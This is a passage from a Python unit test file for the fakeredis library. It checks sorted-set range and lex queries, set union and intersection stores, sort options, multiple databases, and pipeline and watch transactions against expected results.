self.assertEqual(self.redis.zrevrange('foo', 0, 2, withscores=True,
score_cast_func=self._round_str),
expected_with_cast_round)
def test_zrangebyscore(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', two_a_also=2)
self.redis.zadd('foo', two_b_also=2)
self.redis.zadd('foo', four=4)
self.assertEqual(self.redis.zrangebyscore('foo', 1, 3),
[b'two', b'two_a_also', b'two_b_also'])
self.assertEqual(self.redis.zrangebyscore('foo', 2, 3),
[b'two', b'two_a_also', b'two_b_also'])
self.assertEqual(self.redis.zrangebyscore('foo', 0, 4),
[b'zero', b'two', b'two_a_also', b'two_b_also',
b'four'])
self.assertEqual(self.redis.zrangebyscore('foo', '-inf', 1),
[b'zero'])
self.assertEqual(self.redis.zrangebyscore('foo', 2, '+inf'),
[b'two', b'two_a_also', b'two_b_also', b'four'])
self.assertEqual(self.redis.zrangebyscore('foo', '-inf', '+inf'),
[b'zero', b'two', b'two_a_also', b'two_b_also',
b'four'])
def test_zrangebysore_exclusive(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', four=4)
self.redis.zadd('foo', five=5)
self.assertEqual(self.redis.zrangebyscore('foo', '(0', 6),
[b'two', b'four', b'five'])
self.assertEqual(self.redis.zrangebyscore('foo', '(2', '(5'),
[b'four'])
self.assertEqual(self.redis.zrangebyscore('foo', 0, '(4'),
[b'zero', b'two'])
def test_zrangebyscore_raises_error(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
with self.assertRaises(redis.ResponseError):
self.redis.zrangebyscore('foo', 'one', 2)
with self.assertRaises(redis.ResponseError):
self.redis.zrangebyscore('foo', 2, 'three')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebyscore('foo', 2, '3)')
with self.assertRaises(redis.RedisError):
self.redis.zrangebyscore('foo', 2, '3)', 0, None)
def test_zrangebyscore_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebyscore('foo', '(1', '(2')
def test_zrangebyscore_slice(self):
self.redis.zadd('foo', two_a=2)
self.redis.zadd('foo', two_b=2)
self.redis.zadd('foo', two_c=2)
self.redis.zadd('foo', two_d=2)
self.assertEqual(self.redis.zrangebyscore('foo', 0, 4, 0, 2),
[b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebyscore('foo', 0, 4, 1, 3),
[b'two_b', b'two_c', b'two_d'])
def test_zrangebyscore_withscores(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrangebyscore('foo', 1, 3, 0, 2, True),
[(b'one', 1), (b'two', 2)])
def test_zrangebyscore_cast_scores(self):
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', two_a_also=2.2)
expected_without_cast_round = [(b'two', 2.0), (b'two_a_also', 2.2)]
expected_with_cast_round = [(b'two', 2.0), (b'two_a_also', 2.0)]
self.assertItemsEqual(
self.redis.zrangebyscore('foo', 2, 3, withscores=True),
expected_without_cast_round
)
self.assertItemsEqual(
self.redis.zrangebyscore('foo', 2, 3, withscores=True,
score_cast_func=self._round_str),
expected_with_cast_round
)
def test_zrevrangebyscore(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, 1),
[b'three', b'two', b'one'])
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, 2),
[b'three', b'two'])
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, 1, 0, 1),
[b'three'])
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, 1, 1, 2),
[b'two', b'one'])
def test_zrevrangebyscore_exclusive(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zrevrangebyscore('foo', '(3', 1),
[b'two', b'one'])
self.assertEqual(self.redis.zrevrangebyscore('foo', 3, '(2'),
[b'three'])
self.assertEqual(self.redis.zrevrangebyscore('foo', '(3', '(1'),
[b'two'])
self.assertEqual(self.redis.zrevrangebyscore('foo', '(2', 1, 0, 1),
[b'one'])
self.assertEqual(self.redis.zrevrangebyscore('foo', '(2', '(1', 0, 1),
[])
self.assertEqual(self.redis.zrevrangebyscore('foo', '(3', '(0', 1, 2),
[b'one'])
def test_zrevrangebyscore_raises_error(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', 'three', 1)
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', 3, 'one')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', 3, '1)')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', '((3', '1)')
def test_zrevrangebyscore_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebyscore('foo', '(3', '(1')
def test_zrevrangebyscore_cast_scores(self):
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', two_a_also=2.2)
expected_without_cast_round = [(b'two_a_also', 2.2), (b'two', 2.0)]
expected_with_cast_round = [(b'two_a_also', 2.0), (b'two', 2.0)]
self.assertEqual(
self.redis.zrevrangebyscore('foo', 3, 2, withscores=True),
expected_without_cast_round
)
self.assertEqual(
self.redis.zrevrangebyscore('foo', 3, 2, withscores=True,
score_cast_func=self._round_str),
expected_with_cast_round
)
def test_zrangebylex(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zrangebylex('foo', b'(t', b'+'),
[b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'(t', b'[two_b'),
[b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'(t', b'(two_b'),
[b'three_a', b'two_a'])
self.assertEqual(self.redis.zrangebylex('foo', b'[three_a', b'[two_b'),
[b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'(three_a', b'[two_b'),
[b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'(two_b'),
[b'one_a', b'three_a', b'two_a'])
self.assertEqual(self.redis.zrangebylex('foo', b'[two_b', b'(two_b'),
[])
# reversed max + and min - boundaries
# these will be always empty, but allowed by redis
self.assertEqual(self.redis.zrangebylex('foo', b'+', b'-'),
[])
self.assertEqual(self.redis.zrangebylex('foo', b'+', b'[three_a'),
[])
self.assertEqual(self.redis.zrangebylex('foo', b'[o', b'-'),
[])
def test_zrangebylex_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'-', b'+')
def test_zlexcount(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zlexcount('foo', b'(t', b'+'),
3)
self.assertEqual(self.redis.zlexcount('foo', b'(t', b'[two_b'),
3)
self.assertEqual(self.redis.zlexcount('foo', b'(t', b'(two_b'),
2)
self.assertEqual(self.redis.zlexcount('foo', b'[three_a', b'[two_b'),
3)
self.assertEqual(self.redis.zlexcount('foo', b'(three_a', b'[two_b'),
2)
self.assertEqual(self.redis.zlexcount('foo', b'-', b'(two_b'),
3)
self.assertEqual(self.redis.zlexcount('foo', b'[two_b', b'(two_b'),
0)
# reversed max + and min - boundaries
# these will be always empty, but allowed by redis
self.assertEqual(self.redis.zlexcount('foo', b'+', b'-'),
0)
self.assertEqual(self.redis.zlexcount('foo', b'+', b'[three_a'),
0)
self.assertEqual(self.redis.zlexcount('foo', b'[o', b'-'),
0)
def test_zlexcount_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zlexcount('foo', b'-', b'+')
def test_zrangebylex_with_limit(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'+', 1, 2),
[b'three_a', b'two_a'])
# negative offset no results
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'+', -1, 3),
[])
# negative limit ignored
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'+', 0, -2),
[b'one_a', b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'-', b'+', 1, -2),
[b'three_a', b'two_a', b'two_b'])
self.assertEqual(self.redis.zrangebylex('foo', b'+', b'-', 1, 1),
[])
def test_zrangebylex_raises_error(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'', b'[two_b')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'-', b'two_b')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'(t', b'two_b')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b't', b'+')
with self.assertRaises(redis.ResponseError):
self.redis.zrangebylex('foo', b'[two_a', b'')
with self.assertRaises(redis.RedisError):
self.redis.zrangebylex('foo', b'(two_a', b'[two_b', 1)
def test_zrevrangebylex(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zrevrangebylex('foo', b'+', b'(t'),
[b'two_b', b'two_a', b'three_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'[two_b', b'(t'),
[b'two_b', b'two_a', b'three_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'(two_b', b'(t'),
[b'two_a', b'three_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'[two_b', b'[three_a'),
[b'two_b', b'two_a', b'three_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'[two_b', b'(three_a'),
[b'two_b', b'two_a'])
self.assertEqual(self.redis.zrevrangebylex('foo', b'(two_b', b'-'),
[b'two_a', b'three_a', b'one_a'])
self.assertEqual(self.redis.zrangebylex('foo', b'(two_b', b'[two_b'),
[])
# reversed max + and min - boundaries
# these will be always empty, but allowed by redis
self.assertEqual(self.redis.zrevrangebylex('foo', b'-', b'+'),
[])
self.assertEqual(self.redis.zrevrangebylex('foo', b'[three_a', b'+'),
[])
self.assertEqual(self.redis.zrevrangebylex('foo', b'-', b'[o'),
[])
def test_zrevrangebylex_with_limit(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zrevrangebylex('foo', b'+', b'-', 1, 2),
[b'two_a', b'three_a'])
def test_zrevrangebylex_raises_error(self):
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', three_a=0)
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'[two_b', b'')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'two_b', b'-')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'two_b', b'(t')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'+', b't')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'', b'[two_a')
with self.assertRaises(redis.RedisError):
self.redis.zrevrangebylex('foo', b'[two_a', b'(two_b', 1)
def test_zrevrangebylex_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zrevrangebylex('foo', b'+', b'-')
def test_zremrangebyrank(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zremrangebyrank('foo', 0, 1), 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'three'])
def test_zremrangebyrank_negative_indices(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', three=3)
self.assertEqual(self.redis.zremrangebyrank('foo', -2, -1), 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'one'])
def test_zremrangebyrank_out_of_bounds(self):
self.redis.zadd('foo', one=1)
self.assertEqual(self.redis.zremrangebyrank('foo', 1, 3), 0)
def test_zremrangebyrank_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyrank('foo', 1, 3)
def test_zremrangebyscore(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', four=4)
# Outside of range.
self.assertEqual(self.redis.zremrangebyscore('foo', 5, 10), 0)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'zero', b'two', b'four'])
# Middle of range.
self.assertEqual(self.redis.zremrangebyscore('foo', 1, 3), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'zero', b'four'])
self.assertEqual(self.redis.zremrangebyscore('foo', 1, 3), 0)
# Entire range.
self.assertEqual(self.redis.zremrangebyscore('foo', 0, 4), 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [])
def test_zremrangebyscore_exclusive(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', four=4)
self.assertEqual(self.redis.zremrangebyscore('foo', '(0', 1), 0)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'zero', b'two', b'four'])
self.assertEqual(self.redis.zremrangebyscore('foo', '-inf', '(0'), 0)
self.assertEqual(self.redis.zrange('foo', 0, -1),
[b'zero', b'two', b'four'])
self.assertEqual(self.redis.zremrangebyscore('foo', '(2', 5), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'zero', b'two'])
self.assertEqual(self.redis.zremrangebyscore('foo', 0, '(2'), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'two'])
self.assertEqual(self.redis.zremrangebyscore('foo', '(1', '(3'), 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [])
def test_zremrangebyscore_raises_error(self):
self.redis.zadd('foo', zero=0)
self.redis.zadd('foo', two=2)
self.redis.zadd('foo', four=4)
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', 'three', 1)
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', 3, 'one')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', 3, '1)')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', '((3', '1)')
def test_zremrangebyscore_badkey(self):
self.assertEqual(self.redis.zremrangebyscore('foo', 0, 2), 0)
def test_zremrangebyscore_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebyscore('foo', 0, 2)
def test_zremrangebylex(self):
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', three_a=0)
self.assertEqual(self.redis.zremrangebylex('foo', b'(three_a', b'[two_b'), 2)
self.assertEqual(self.redis.zremrangebylex('foo', b'(three_a', b'[two_b'), 0)
self.assertEqual(self.redis.zremrangebylex('foo', b'-', b'(o'), 0)
self.assertEqual(self.redis.zremrangebylex('foo', b'-', b'[one_a'), 1)
self.assertEqual(self.redis.zremrangebylex('foo', b'[tw', b'+'), 0)
self.assertEqual(self.redis.zremrangebylex('foo', b'[t', b'+'), 1)
self.assertEqual(self.redis.zremrangebylex('foo', b'[t', b'+'), 0)
def test_zremrangebylex_error(self):
self.redis.zadd('foo', two_a=0)
self.redis.zadd('foo', two_b=0)
self.redis.zadd('foo', one_a=0)
self.redis.zadd('foo', three_a=0)
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebylex('foo', b'(t', b'two_b')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebylex('foo', b't', b'+')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebylex('foo', b'[two_a', b'')
def test_zremrangebylex_badkey(self):
self.assertEqual(self.redis.zremrangebylex('foo', b'(three_a', b'[two_b'), 0)
def test_zremrangebylex_wrong_type(self):
self.redis.sadd('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zremrangebylex('foo', b'bar', b'baz')
def test_zunionstore(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'])
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'three', 3), (b'two', 4)])
def test_zunionstore_sum(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'three', 3), (b'two', 4)])
def test_zunionstore_max(self):
self.redis.zadd('foo', one=0)
self.redis.zadd('foo', two=0)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='MAX')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1), (b'two', 2), (b'three', 3)])
def test_zunionstore_min(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=0)
self.redis.zadd('bar', two=0)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='MIN')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 0), (b'two', 0), (b'three', 3)])
def test_zunionstore_weights(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', four=4)
self.redis.zunionstore('baz', {'foo': 1, 'bar': 2}, aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 3), (b'two', 6), (b'four', 8)])
def test_zunionstore_mixed_set_types(self):
# No score, redis will use 1.0.
self.redis.sadd('foo', 'one')
self.redis.sadd('foo', 'two')
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'three', 3), (b'two', 3)])
def test_zunionstore_badkey(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zunionstore('baz', ['foo', 'bar'], aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1), (b'two', 2)])
self.redis.zunionstore('baz', {'foo': 1, 'bar': 2}, aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1), (b'two', 2)])
def test_zunionstore_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zunionstore('baz', ['foo', 'bar'])
def test_zinterstore(self):
self.redis.zadd('foo', one=1)
self.redis.zadd('foo', two=2)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zinterstore('baz', ['foo', 'bar'])
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'two', 4)])
def test_zinterstore_mixed_set_types(self):
self.redis.sadd('foo', 'one')
self.redis.sadd('foo', 'two')
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zinterstore('baz', ['foo', 'bar'], aggregate='SUM')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 2), (b'two', 3)])
def test_zinterstore_max(self):
self.redis.zadd('foo', one=0)
self.redis.zadd('foo', two=0)
self.redis.zadd('bar', one=1)
self.redis.zadd('bar', two=2)
self.redis.zadd('bar', three=3)
self.redis.zinterstore('baz', ['foo', 'bar'], aggregate='MAX')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1), (b'two', 2)])
def test_zinterstore_onekey(self):
self.redis.zadd('foo', one=1)
self.redis.zinterstore('baz', ['foo'], aggregate='MAX')
self.assertEqual(self.redis.zrange('baz', 0, -1, withscores=True),
[(b'one', 1)])
def test_zinterstore_nokey(self):
with self.assertRaises(redis.ResponseError):
self.redis.zinterstore('baz', [], aggregate='MAX')
def test_zunionstore_nokey(self):
with self.assertRaises(redis.ResponseError):
self.redis.zunionstore('baz', [], aggregate='MAX')
def test_zinterstore_wrong_type(self):
self.redis.set('foo', 'bar')
with self.assertRaises(redis.ResponseError):
self.redis.zinterstore('baz', ['foo', 'bar'])
def test_empty_zset(self):
self.redis.zadd('foo', one=1)
self.redis.zrem('foo', 'one')
self.assertFalse(self.redis.exists('foo'))
def test_multidb(self):
r1 = self.create_redis(db=0)
r2 = self.create_redis(db=1)
r1['r1'] = 'r1'
r2['r2'] = 'r2'
self.assertTrue('r2' not in r1)
self.assertTrue('r1' not in r2)
self.assertEqual(r1['r1'], b'r1')
self.assertEqual(r2['r2'], b'r2')
self.assertEqual(r1.flushall(), True)
self.assertTrue('r1' not in r1)
self.assertTrue('r2' not in r2)
def test_basic_sort(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort('foo'), [b'1', b'2', b'3'])
def test_empty_sort(self):
self.assertEqual(self.redis.sort('foo'), [])
def test_sort_range_offset_range(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort('foo', start=0, num=2), [b'1', b'2'])
def test_sort_range_offset_range_and_desc(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort("foo", start=0, num=1, desc=True),
[b"4"])
def test_sort_range_offset_norange(self):
with self.assertRaises(redis.RedisError):
self.redis.sort('foo', start=1)
def test_sort_range_with_large_range(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
# num=20 even though len(foo) is 4.
self.assertEqual(self.redis.sort('foo', start=1, num=20),
[b'2', b'3', b'4'])
def test_sort_descending(self):
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort('foo', desc=True), [b'3', b'2', b'1'])
def test_sort_alpha(self):
self.redis.rpush('foo', '2a')
self.redis.rpush('foo', '1b')
self.redis.rpush('foo', '2b')
self.redis.rpush('foo', '1a')
self.assertEqual(self.redis.sort('foo', alpha=True),
[b'1a', b'1b', b'2a', b'2b'])
def test_sort_wrong_type(self):
self.redis.set('string', '3')
with self.assertRaises(redis.ResponseError):
self.redis.sort('string')
def test_foo(self):
self.redis.rpush('foo', '2a')
self.redis.rpush('foo', '1b')
self.redis.rpush('foo', '2b')
self.redis.rpush('foo', '1a')
with self.assertRaises(redis.ResponseError):
self.redis.sort('foo', alpha=False)
def test_sort_with_store_option(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
self.assertEqual(self.redis.sort('foo', store='bar'), 4)
self.assertEqual(self.redis.lrange('bar', 0, -1),
[b'1', b'2', b'3', b'4'])
def test_sort_with_by_and_get_option(self):
self.redis.rpush('foo', '2')
self.redis.rpush('foo', '1')
self.redis.rpush('foo', '4')
self.redis.rpush('foo', '3')
self.redis['weight_1'] = '4'
self.redis['weight_2'] = '3'
self.redis['weight_3'] = '2'
self.redis['weight_4'] = '1'
self.redis['data_1'] = 'one'
self.redis['data_2'] = 'two'
self.redis['data_3'] = 'three'
self.redis['data_4'] = 'four'
self.assertEqual(self.redis.sort('foo', by='weight_*', get='data_*'),
[b'four', b'three', b'two', b'one'])
self.assertEqual(self.redis.sort('foo', by='weight_*', get='#'),
[b'4', b'3', b'2', b'1'])
self.assertEqual(
self.redis.sort('foo', by='weight_*', get=('data_*', '#')),
[b'four', b'4', b'three', b'3', b'two', b'2', b'one', b'1'])
self.assertEqual(self.redis.sort('foo', by='weight_*', get='data_1'),
[None, None, None, None])
def test_sort_with_hash(self):
self.redis.rpush('foo', 'middle')
self.redis.rpush('foo', 'eldest')
self.redis.rpush('foo', 'youngest')
self.redis.hset('record_youngest', 'age', 1)
self.redis.hset('record_youngest', 'name', 'baby')
self.redis.hset('record_middle', 'age', 10)
self.redis.hset('record_middle', 'name', 'teen')
self.redis.hset('record_eldest', 'age', 20)
self.redis.hset('record_eldest', 'name', 'adult')
self.assertEqual(self.redis.sort('foo', by='record_*->age'),
[b'youngest', b'middle', b'eldest'])
self.assertEqual(
self.redis.sort('foo', by='record_*->age', get='record_*->name'),
[b'baby', b'teen', b'adult'])
def test_sort_with_set(self):
self.redis.sadd('foo', '3')
self.redis.sadd('foo', '1')
self.redis.sadd('foo', '2')
self.assertEqual(self.redis.sort('foo'), [b'1', b'2', b'3'])
def test_pipeline(self):
# The pipeline method returns an object for
# issuing multiple commands in a batch.
p = self.redis.pipeline()
p.watch('bam')
p.multi()
p.set('foo', 'bar').get('foo')
p.lpush('baz', 'quux')
p.lpush('baz', 'quux2').lrange('baz', 0, -1)
res = p.execute()
# Check return values returned as list.
self.assertEqual(res, [True, b'bar', 1, 2, [b'quux2', b'quux']])
# Check side effects happened as expected.
self.assertEqual(self.redis.lrange('baz', 0, -1), [b'quux2', b'quux'])
# Check that the command buffer has been emptied.
self.assertEqual(p.execute(), [])
def test_pipeline_ignore_errors(self):
"""Test the pipeline ignoring errors when asked."""
with self.redis.pipeline() as p:
p.set('foo', 'bar')
p.rename('baz', 'bats')
with self.assertRaises(redis.exceptions.ResponseError):
p.execute()
self.assertEqual([], p.execute())
with self.redis.pipeline() as p:
p.set('foo', 'bar')
p.rename('baz', 'bats')
res = p.execute(raise_on_error=False)
self.assertEqual([], p.execute())
self.assertEqual(len(res), 2)
self.assertIsInstance(res[1], redis.exceptions.ResponseError)
def test_multiple_successful_watch_calls(self):
p = self.redis.pipeline()
p.watch('bam')
p.multi()
p.set('foo', 'bar')
# Check that the watched keys buffer has been emptied.
p.execute()
# bam is no longer being watched, so it's ok to modify
# it now.
p.watch('foo')
self.redis.set('bam', 'boo')
p.multi()
p.set('foo', 'bats')
self.assertEqual(p.execute(), [True])
def test_pipeline_non_transactional(self):
# For our simple-minded model I don't think
# there is any observable difference.
p = self.redis.pipeline(transaction=False)
res = p.set('baz', 'quux').get('baz').execute()
self.assertEqual(res, [True, b'quux'])
def test_pipeline_raises_when_watched_key_changed(self):
self.redis.set('foo', 'bar')
self.redis.rpush('greet', 'hello')
p = self.redis.pipeline()
self.addCleanup(p.reset)
p.watch('greet', 'foo')
nextf = fakeredis.to_bytes(p.get('foo')) + b'baz'
# Simulate change happening on another thread.
self.redis.rpush('greet', 'world')
# Begin pipelining.
p.multi()
p.set('foo', nextf)
with self.assertRaises(redis.WatchError):
p.execute()
def test_pipeline_succeeds_despite_unwatched_key_changed(self):
# Same setup as before except for the params to the WATCH command.
self.redis.set('foo', 'bar')
self.redis.rpush('greet', 'hello')
p = self.redis.pipeline()
try:
# Only watch one of the 2 keys.
p.watch('foo')
nextf = fakeredis.to_bytes(p.get('foo')) + b'baz'
# Simulate change happening on another thread.
self.redis.rpush('greet', 'world')
p.multi()
p.set('foo', nextf)
p.execute()
# Check the commands were executed.
self.assertEqual(self.redis.get('foo'), b'barbaz')
finally:
p.reset()
def test_pipeline_succeeds_when_watching_nonexistent_key(self):
self.redis.set('foo', 'bar')
self.redis.rpush('greet', 'hello')
p = self.redis.pipeline()
try:
# Also watch a nonexistent key.
p.watch('foo', 'bam')
nextf = fakeredis.to_bytes(p.get('foo')) + b'baz'
# Simulate change happening on another thread.
self.redis.rpush('greet', 'world')
p.multi()
p.set('foo', nextf)
p.execute()
# Check the commands were executed.
self.assertEqual(self.redis.get('foo'), b'barbaz')
finally:
p.reset()
def test_watch_state_is_cleared_across_multiple_watches(self):
self.redis.set('foo', 'one')
self.redis.set('bar', 'baz')
p = self.redis.pipeline()
self.addCleanup(p.reset)
p.watch('foo')
# Simulate change happening on another thread.
self.redis.set('foo', 'three')
p.multi()
p.set('foo', 'three')
with self.assertRaises(redis.WatchError):
p.execute()
# Now watch another key. It should be ok to change
# foo as we're no longer watching it.
p.watch('bar')
self.redis.set('foo', 'four')
p.multi()
p.set('bar', 'five')
self.assertEqual(p.execute(), [True])
def test_pipeline_proxies_to_redis_object(self):
p = self.redis.pipeline()
self.assertTrue(hasattr(p, 'zadd'))
with self.assertRaises(AttributeError):
p.non_existent_attribute
def test_pipeline_as_context_manager(self):
self.redis.set('foo', 'bar')
with self.redis.pipeline() as p:
p.watch('foo')
self.assertTrue(isinstance(p, redis.client.BasePipeline)
or p.need_reset)
p.multi()
p.set('foo', 'baz')
p.execute()
# Usually you would consider the pipeline to
# have been destroyed
